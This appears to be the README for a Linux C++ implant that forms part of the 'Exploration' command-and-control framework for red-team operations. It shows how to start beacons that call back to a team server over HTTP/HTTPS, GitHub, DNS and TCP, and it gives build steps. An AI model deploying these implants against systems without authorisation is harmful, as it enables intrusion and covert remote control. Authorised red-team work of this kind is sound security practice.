C2LinuxImplant
Linux C++ Implant for Exploration C2
Install / Use
/learn @maxDcb/C2LinuxImplantREADME
Exploration C2 Linux Implant
Overview
Exploration is a modular Command and Control (C2) framework designed for red team operations. This repository provides the Beacon component implemented in C++ for targeting Linux systems. The associated TeamServer and Client components are available in the C2TeamServer repository.
Multiple Beacons in this project are capable of communicating with the TeamServer over various channels. Supported transport mechanisms include HTTP/HTTPS, GitHub, DNS, and TCP.
Communication Examples
# HTTP/HTTPS
BeaconHttp <TEAMSERVER_IP> <LISTENER_PORT> <http|https>
BeaconHttp 10.10.10.10 8443 https
BeaconHttp 10.10.10.10 8080 http
# GitHub
BeaconGithub <GITHUB_USER/REPO> <ACCESS_TOKEN>
BeaconGithub maxDcb/C2Implant ghp_dsfgdfhdf5554456g4fdg465...
# DNS
BeaconDns <DNS_SERVER> <TEAMSERVER_DOMAIN>
BeaconDns 8.8.8.8 bac.superdomain.com
# TCP
BeaconTcp <LISTENER_IP> <LISTENER_PORT>
BeaconTcp 127.0.0.1 4444
Build Instructions
Submodules & External Dependencies
This project utilizes several external libraries and tools:
- Donut: Generates shellcode from PE files.
- COFFLoader: Executes object files, such as those in CS-Situational-Awareness-BOF.
- cpp-base64: Provides base64 encoding/decoding.
- nlohmann/json: JSON parsing library.
Building the Linux Beacons and Modules
Initialize submodules and prepare the build environment:
git submodule update --init
mkdir build
cd build
Compile:
cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake
make -j4
Project can also be build with the C2Core package:
# download last linux package
url="$(curl -sH 'Accept: application/vnd.github+json' \
${GITHUB_TOKEN:+-H "Authorization: Bearer $GITHUB_TOKEN"} \
'https://api.github.com/repos/maxDcb/C2Core/releases?per_page=100' \
| jq -r '[.[] | select(.tag_name|startswith("linux-"))]
| sort_by(.created_at) | reverse
| .[0].assets[]
| select(.name|test("^C2Core-Linux.*"))
| .browser_download_url' | head -n1)"
fname="${url##*/}"
curl -L "$url" -o "$fname"
echo "Downloaded: $fname"
mkdir -p C2Core-Linux && tar -xzf C2Core-Linux.tar.gz -C C2Core-Linux
export CMAKE_PREFIX_PATH=`pwd`/C2Core-Linux
cmake .. -DCMAKE_PROJECT_TOP_LEVEL_INCLUDES=./conan_provider.cmake
make -j4
Output Locations
- Compiled Beacons:
Release/Beacons - Compiled Modules:
Release/Modules
